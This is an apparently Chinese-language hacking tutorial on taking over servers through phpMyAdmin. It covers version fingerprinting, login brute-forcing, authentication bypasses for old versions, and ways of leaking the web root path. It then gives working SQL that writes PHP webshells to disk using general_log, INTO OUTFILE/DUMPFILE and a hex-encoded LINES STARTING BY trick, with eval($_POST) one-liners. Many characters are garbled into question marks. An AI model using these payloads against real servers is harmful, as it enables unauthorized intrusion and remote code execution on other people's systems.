PHPMyadmin拿shell

基于PHPMyadmin的攻击

找到页面后,先判断版本:

登录框查看
也可以直接访问:/doc/html/index.html目录


口令爆破: burp等

远程代码执?等漏洞

后台bypass【万能密码】
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使?‘localhost’@‘@”为账号,密码不?输?。
phpmyadmin2.11.9.2 这个版本存在空口令。直接root??登陆,密码不?

GETSHELL(方法很多很多)

物理路径获取

报错?站代码问题报错 :?般就是加 ‘ 等特殊字符

解析器(Web容器、中间件)报错 如 IIS7.5:?般就是加?些不存在的?录名字

Google爆路径 结合关键字和site语法搜索出错

??快照,常?关键字有warning和fatal error。注意,如果?标站点 是?级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning Site:xxx.com.tw "atal error"

根据正常的安装?件猜 ?如phpstudy的默认?站?录是:c:/phpStudy/phpstudy/PHPTutorial/WWW/

读取解析器的配置?件
正常情况我们是?法得知解析器的配置?件的,这个时候就是尝试解析器默认的安装路径。
取巧假设某种情况下,我们得知?标是?的phpstudy,可是不是在默认的路径,我们就可以读取路径 select @basedir ,
得到路径后,推测?站路径。

旁站报错 你的?标是不报错的,但是不代表你的?标?站的邻居不报错啊。?如?标站是 www.target.com ,
它的邻居 是:www.victim.com ,邻居?站有注?,加 ‘ 后爆出它的?站某个??路径是:c:/wwwroot/victim/news.asp ,
那 你根据这个推荐你的?标站点的路径就有可能是 c:/wwwroot/target/ 。

其他信息phpinfo??

?站源码备份 ……

通过?志拿shell

原理,phpmyadmin有?个记录?志的?件,但是?般情况下会关闭,开启?志记录,然后设置?志记录名称为.php,
随便执? sql语句,只要包括?句话木?就会被写?到?志中去,然后就可以连接getshell。

set global general_log=‘on‘ //?先设置为on 
set global general_log_file ="E:\\wamp\\wamp\\www\\3.php" 
#执??条带有?句话??代码的SQL语句,
如: select ‘<?php eval($_POST[‘mima‘])?>;

导出拿shell

正常导出拿shell

  1. SELECT "<?php phpinfo();?>" INTO OUTFILE "E:\wamp\wamp\www\2.php"
  2. SELECT "<?php phpinfo();?>" INTO dumpFILE "E:\wamp\wamp\www\2.php"

创建表导出shell
CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES(‘<?php eval($_POST[1]);?>‘);
select cmd from a into outfile ‘D:/phpMyAdmin/libraries/d.php‘;
DROP TABLE IF EXISTS a;

猥琐型导出

select * from admin where userid=1 into outfile "x:\wwwroot\sx.php" LINES STARTING BY 0x3C3F70687020706870696E666F28293F3E%23

写完语句,要?hackbar的urlencode编码?下,不然很??率是不成功的哟。这个可以在基于MySQL的报错注?中 写webshell。

0x3C3F70687020706870696E666F28293F3E=<?php phpinfo()?>